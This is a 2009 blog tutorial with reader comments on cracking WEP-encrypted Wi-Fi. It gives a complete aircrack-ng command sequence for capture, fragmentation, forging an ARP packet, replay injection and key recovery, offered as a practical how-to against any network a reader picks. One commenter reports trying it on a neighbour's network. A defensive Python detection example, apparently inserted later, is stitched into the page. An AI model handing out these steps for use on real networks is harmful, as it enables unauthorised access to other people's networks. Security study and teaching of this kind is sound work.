WEP Wireless Hacking
by Josh Houston on Mar.25, 2009, under Hacking, Security, Wireless
In this video tutorial, I show you how to crack a wireless network secured with WEP encryption. Although it may sound hard, it is actually much easier than you might think. I have also provided a written tutorial for you to save, and the video is also available for download. The following are links to an outside website (mediafire) hosting the videos: Video 1. Video 2.
- Type in "airmon-ng" to see the wireless adapters on your computer.
- You should see a listing come up. Mine showed wlan0. Yours may be different, such as rausb0.
- Type in "airmon-ng start wlan0" to start your wireless device, replacing "wlan0" with whatever yours showed. This will create a new "virtual" device and will show its name. The name of mine was "mon0".
- Open a new terminal window and type "airodump-ng mon0", again replacing "mon0" with the name of your new virtual device.
You will begin to see a listing of different APs (access points). Find the one you want and press Control + C. Pressing Control + C cancels the program currently running in the terminal. The names of the networks found are under the ESSID column. You may not see anything there, which is fine; some of them are hidden. FUSiON is the name of my network, so I went over to the BSSID column and copied the address, which was 00:23:69:18:E4:7D. This address is important, so I recommend copying it or writing it down. Also take note of which channel it is on.
- This is what I typed after that: "airodump-ng --bssid 00:23:69:18:E4:7D --channel 6 --ivs -w FUSiON mon0". This is all really easy stuff, so I'll just explain it to you right quick. airodump-ng is the program that captures what are called IVs (initialization vectors), the primary component in cracking WEP networks. Here goes!
- Type "airodump-ng".
- Add a space and type "--bssid 00:23:69:18:E4:7D", replacing the address with the address of your network. This "flag" says we only want to see this address and nothing else.
- Add a space and type "--channel 6", replacing the number 6 with the number of your network's channel (although 6 is VERY common, so don't be surprised if that is it).
- Add a space and type "--ivs". This flag captures only the IVs, which makes cracking the password faster.
- Add a space and type "-w FUSiON", replacing FUSiON with the name of your network, or something that you will remember, as we will be cracking this file later to find the password. I just use the name of the network because it helps me remember.
- The "mon0" at the end simply defines which device to use.
- Open a new terminal window. In it, type "aireplay-ng -5 -b 00:23:69:18:E4:7D mon0".
- aireplay-ng is a tool that greatly helps generate IVs. Without it, it wouldn't be possible to crack most WEP networks.
- The "-5" flag selects one method, and the most common one, that is used to generate the IVs.
- The "-b 00:23:69:18:E4:7D" tells it which address to attack. The -b stands for BSSID, which is the address of your network, so you will have to replace 00:23:69:18:E4:7D with the address of your network (the one I recommended you write down or copy earlier).
- The "mon0" at the end again just defines which device to use.
- Wait, and press "y" for yes when it asks whether you would like to use the selected frame.
- This process may have to be repeated until you have a resulting fragment file; it will say when you do. Additionally, you can run the command "aireplay-ng -1 1 -a 00:23:69:18:E4:7D mon0" to help with getting a fragment file. Again, make sure to replace my address with your own.
- Now we must build a file that will be used to gather those precious IVs! I did it with the following command:
"packetforge-ng -0 -a 00:23:69:18:E4:7D -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0324-230256.xor -w arpy"
Let me break this down for you.
- packetforge-ng is the program which will build the ARP file, as I like to call it, which you will soon see.
- Add a space and follow it with "-0 -a 00:23:69:18:E4:7D", and of course replace it with your own network address.
- Add a space and type in "-h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255". This part of the command is pretty universal and rarely changed, so we won't go into detail on it here.
- Add a space and type in "-y fragment-XXXX-XXXXXX.xor", replacing this one with the name of your own fragment file as well.
- And lastly, type in "-w arpy"; just the -w is important. The "arpy" can be anything you can remember. It's something I've just always used, because it's easy for me to remember.
- If all goes well, it reports that it successfully built our ARP packet.
- Almost done! "aireplay-ng -3 -r arpy -b 00:23:69:18:E4:7D mon0" is our next command.
- aireplay-ng, like before, should get those IVs flowing in. On average, I see about 500 IVs/second, which isn't too bad. But some cards do better than others, so you may have better or worse luck.
- -r arpy is a flag that tells aireplay-ng to replay the ARP file we created, called arpy.
- Like before, -b 00:23:69:18:E4:7D specifies which address to attack, and mon0 says which wireless interface to use.
- If all went well, we are gathering IVs! Open the airodump-ng terminal window that we've had open and look at the Data column. It should be constantly rising. This is the longest process, as we have to wait. While others recommend getting at least 100,000 IVs, I've never waited that long. I've cracked many WEPs at just 20,000, although I recommend cracking at 40,000 IVs. So go get a Dr. Pepper and wait a while until you have enough accumulated.
- Once you have at least 40,000, we can start cracking the WEP password!
- This step has to be the simplest.
- Open a new terminal window and type "aircrack-ng XXXX-01.ivs", replacing XXXX with the name you gave to -w when you first started the airodump-ng command.
- Depending on the speed of your computer, you will soon have the WEP key decrypted. Just make sure to remove the colons ":" before entering the key.
There we go; that is my tutorial on basic WEP cracking. Any questions, comments, or suggestions are GREATLY appreciated!
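The walkthrough above recovers the key by making the access point emit huge numbers of encrypted frames, and the ARP replay step does that by resending one captured frame over and over. As an added example that is not part of Josh's tutorial and not aircrack-ng code, the Python below shows the defender's side of the same two facts: how small WEP's 24-bit IV space is at the roughly 500 IVs/second injection rate quoted above, and a simple detection rule that flags a replay burst (one source MAC transmitting the same IV hundreds of times within a second) over a constructed set of frame records. The frame-record format, the 00:11:22:33:44:55 station address (borrowed from the packetforge-ng command above), the other MAC addresses, the IV values and the alert threshold are all assumptions made for the example.

```python
"""Added example (not from the original tutorial): two defender-side checks
for the WEP weaknesses the walkthrough exploits.

1. iv_space_stats(): how quickly WEP's 24-bit IV space is exhausted, and how
   soon an IV repeats, at the injection rate the tutorial reports.
2. detect_arp_replay(): flag an aireplay-ng -3 style ARP replay, which looks
   like one client MAC sending the same short encrypted frame (and therefore
   the same IV) hundreds of times per second. The frame records used here are
   constructed sample data, not a real capture.
"""
import math
from collections import defaultdict

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS  # 16,777,216 possible WEP IVs


def iv_space_stats(frames_per_second=500):
    """Return (seconds to exhaust the IV space, frames until a 50% chance of
    an IV repeat) for a station emitting frames_per_second data frames."""
    exhaust_seconds = IV_SPACE / frames_per_second
    # Birthday bound: n ~ sqrt(2 * N * ln 2) gives a 50% collision probability
    # among n random draws from N values.
    birthday_frames = math.sqrt(2 * IV_SPACE * math.log(2))
    return exhaust_seconds, int(birthday_frames)


def detect_arp_replay(frames, threshold=50):
    """Return sorted alerts (second, src, iv, count) for every source MAC that
    sent the same IV more than `threshold` times within one wall-clock second.
    Legitimate WEP stations increment the IV per frame, so a repeated IV at
    this rate is a replay, not normal traffic."""
    counts = defaultdict(int)
    for frame in frames:
        counts[(int(frame["time"]), frame["src"], frame["iv"])] += 1
    return sorted(
        (sec, src, iv, n) for (sec, src, iv), n in counts.items() if n > threshold
    )


def build_sample_frames():
    """Constructed sample capture (assumption, not real data): a benign client
    sending a few frames with fresh IVs, followed by a replay burst."""
    frames = []
    # Benign client: five data frames, each with a distinct IV.
    for i in range(5):
        frames.append({"time": 0.1 * i, "src": "00:1a:2b:3c:4d:5e",
                       "iv": 0x400000 + i, "len": 120})
    # Replayed ARP request: the identical 68-byte frame, identical IV,
    # 300 times within the following second.
    for i in range(300):
        frames.append({"time": 1.0 + i / 300.0, "src": "00:11:22:33:44:55",
                       "iv": 0x0A0B0C, "len": 68})
    return frames


if __name__ == "__main__":
    secs, birthday = iv_space_stats(500)
    print(f"IV space exhausted in {secs / 3600:.1f} hours at 500 frames/s")
    print(f"50% chance of a repeated IV after about {birthday} frames")
    for sec, src, iv, n in detect_arp_replay(build_sample_frames()):
        print(f"second {sec}: {src} repeated IV {iv:06x} {n} times -> replay")
```

In practice the same rule would run over frames pulled from a monitor-mode capture rather than the constructed list; the per-second key keeps it cheap enough for a live feed. Detection only tells you an attack is in progress, though. No rate limit changes the size of the IV space, so the durable fix is to retire WEP in favour of WPA2.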
May 16th, 2009 on 3:58 pm
I changed my MAC address to 00:11:22:33:44:55 following your tutorial and don't know what my previous MAC address was. Do I need to change it back?
I cannot connect to the internet in BT4 right now and am not sure what I need to do to undo what I have done so that I can connect. I am connected to my network but it is unable to pull any web pages.
Thanks for the great tutorial. I successfully cracked my own WEP but now can't even use it.
May 19th, 2009 on 10:13 am
Hey Josh, I'm just starting hacking and I am trying to crack my WEP. I'm using VMware Workstation to run BT4 beta, and when I open a terminal window and type airmon-ng it won't find any wireless adaptor, even though when I go back to my Windows desktop I'm connected. Could you help me out? Thanks!!!!!
May 19th, 2009 on 10:18 am
JT, you don't have to change your MAC address. A simple restart should restore your MAC to the original.
May 19th, 2009 on 10:22 am
Bert, I do not use Workstation, I use VMware Server. There should be somewhere that you assign a USB device to the virtual OS. I will see if I cannot find some information for you soon.
June 7th, 2009 on 1:04 pm
Bert, you cannot use an internal device with BT in VMware. You will need to get an external USB wireless device in order for the BT VM to work properly.
Regards,
-Chrisso
June 17th, 2009 on 9:06 am
What do you need, other than BackTrack 4, in order for this to work? I downloaded BackTrack 3 previously, but the program won't run.
June 27th, 2009 on 7:11 am
Hi... I have many questions.
1- If my network name is S WIFI, how should I write it in the terminal?
2- When I run airodump-ng --bssid 00:23:69:18:E4:7D --channel 6 --ivs -w S WIFI mon0
Invalid output format: IVS and PCAP format cannot be used together.
3-#aireplay-ng -5 -b 00:1E:40:14:E7:8F mon0
No source MAC (-h) specified. Using the device MAC (00:13:02:31:6D:F8)
16:07:31 Waiting for beacon frame (BSSID: 00:1E:40:14:E7:8F) on channel 6
16:07:31 mon0 is on channel 6, but the AP uses channel 11
July 1st, 2009 on 4:48 am
That's a great tut, man. I really appreciate it.
July 17th, 2009 on 3:46 pm
Are you going to produce a WPA cracking tutorial? I loved the WEP ones. I would like to see how strong my personal WPA AP’s are.
Thanks!
July 28th, 2009 on 6:28 pm
This may be a dumb question: I used the BT3 final ISO on VMware Workstation and I was able to see the whole Linux OS, where I could open terminals and everything worked fine. When I do the same with the BT4 pre-final ISO all I get is a terminal screen, so I can't browse or see the desktop or anything. Anyone know why this is?
July 28th, 2009 on 6:42 pm
Figured it out... in case anyone has the same problem, type in startx
August 14th, 2009 on 3:34 am
Hello sir,
Your tutorial was very crisp, clear and brilliant.
Thanks a lot for your hard work in bringing up this website and for your helping mind.
Thank you
mi2
August 14th, 2009 on 10:05 am
Hello sir,
I have a problem with the 3rd command, that is "airodump mon0": it says bad file name or something, but my virtual device name is mon0; I saw that in brackets.
Please help me...!!!
August 14th, 2009 on 9:03 pm
Hello sir, I am done with the above problem, that is, instead of mon0 I just put in wlan0, but I have another problem with the 4th command. I get an error message saying that IVS and pcap cannot be compiled together. Please help. If you could post your Yahoo or Hotmail instant messenger ID, it would help us a lot.
Thank you
August 17th, 2009 on 9:49 pm
Hey. When I type airodump-ng -bssid 00:1C:F0... etc., then channel and ivs and -w and the network name, when I hit enter it says invalid option 'I'. Or it says did you mean --bssid. What is going wrong?
August 19th, 2009 on 6:38 am
Hey, you can also use Kismet and jc-wepcrack as well.
What do you think about using Kismet?
August 19th, 2009 on 6:39 am
What do you think about using Kismet, and jc-wepcrack?
I have used them before.
August 31st, 2009 on 2:05 pm
hi josh.
This is only for Mac, right? I have Windows... how can I do that??
Please
September 8th, 2009 on 7:02 pm
hi josh.
When I type: aireplay-ng -5 FF:FF:FF:FF:FF:FF mon0 and then I type "y", it doesn't show the same as in your video, and then the konsole asks if I want to try another packet. I did that about 10 times and it was the same. What else can I do??
September 17th, 2009 on 12:52 am
I was under the impression you said there was a copy of the video available to download on this site. I know it's late and I've done been out of coffee, but I am missing it. I wanted to download/archive it to share with a friend; you never know when good stuff like this gets taken down.
October 19th, 2009 on 4:44 am
Hi Josh, first of all, impressive work, I must add. I tried what you said in the tutorial but I met a problem while looking for fragments. It keeps saying not enough ACKs or trying LLC NULL packets, and it keeps asking me to change packets (use this packet? y). What is the problem and how can I solve this? I await your reply. Thanks.
October 25th, 2009 on 6:47 pm
Hey there Josh..
On step 7, after I write
aireplay-ng -1 1 -a MY_AP_MAC mon0
It displays that the association was successful, but the command on step 5-6 starts failing with:
Sending fragmented packet
No answer, repeating…
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating…
So the packet/IV collection fails..
A little help here please.
thanks
November 2nd, 2009 on 11:41 am
My Apologies. I said the videos were available for download, yet the links were never provided.
I have fixed this and the links are now at the top of the entry.
Thanks!
Josh Houston~
December 5th, 2009 on 5:44 pm
For those of you who are having the issue with "IVS and pcap cannot be compiled together": instead of using "--ivs", type "--output-format ivs". That'll give you the same results and fix the issue.. happy hacking.
December 27th, 2009 on 12:15 am
How do I know what I should change "hda1" to in the line: Type in "chntpw -i /mnt/hda1/Windows/system32/config/SAM"
January 2nd, 2010 on 8:40 pm
After following the tutorial I get stuck on producing enough Data through sending the ARP packets. I know you said something about MAC filtering. Do you think this means there is MAC filtering enabled?
January 10th, 2010 on 3:48 pm
Hi Josh, it was an impressive tutorial.
I have got some queries:
1.) It says: ivs and pcap format cannot be used together
2.) After executing airmon-ng start wlan0 in your video, under the driver heading it shows [phy1], but mine shows [phy0]. So what difference does it make?
I'll be thankful if you help me out.
January 25th, 2010 on 1:30 pm
Hello, your tutorial is the very best!
But I have a problem in step 9: the terminal says error with the -0, and the tuto doesn't work with all wifi, because I tried on my neighbour's wifi and it doesn't work. But what is the answer for my problem, please?
Sorry for my bad English, but I'm French.
Thank you
February 6th, 2010 on 1:06 pm
Can you help me with how to hack a WPA2 password?..... Thanks in advance
April 5th, 2010 on 12:52 am
Dear Josh,
I have to admit this was my first video tutorial that was really well done and explained. Thanks a lot!!!
Do you plan to throw another video tutorial for WPA2 as well?
April 14th, 2010 on 1:22 pm
Sir, only one question: I looked at the driver compatibility list which you provided in the video link, but still I cannot figure out about the TP-Link eXtended Range 54M Wireless Cardbus Adapter (TL-WN510G). Is it compatible or not? Please be clear.
April 14th, 2010 on 1:23 pm
Sorry, I'm using BackTrack 4.
April 14th, 2010 on 1:27 pm
Could you please also tell me about the TP-Link TL-WN321G device compatibility, please?
June 6th, 2010 on 2:56 am
Thank you so much for making this tutorial, Josh. I have been working on a school project in computer science on wi-fi security and have been using your guide to understand how and why it is possible to crack WEP. Give yourself a pat on the shoulder, mate; it's an excellent tutorial.
June 7th, 2010 on 12:31 am
I will have to come back again when my class load lets up; however, I am taking your RSS feed so I can read your site offline. Thanks.
July 5th, 2010 on 8:08 pm
Hello Josh.
Thank you for such a well thought out tutorial that helps all of us n00bs learn this stuff, since most of us are either just getting into Linux/Ubuntu or wifi security.
I am having difficulty when I attempt to build the ARP packet. I get an error about the MAC address. I can only assume this has to do with the 00:11:22:33:44:55 MAC I typed in that command, and that it might need to be replaced if the AP is using MAC filtering, so I will have to use a MAC address I have authorized to access my network.
Does that sound like it may be the problem?
Thanks
September 20th, 2010 on 4:25 am
Hi Josh!!!,
I did what you said in the tutorial, but my problem is when it comes to "aireplay-ng" I cannot save the packet..
It says: Sending fragmented packet
No answer, repeating…
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating…
What is the problem here?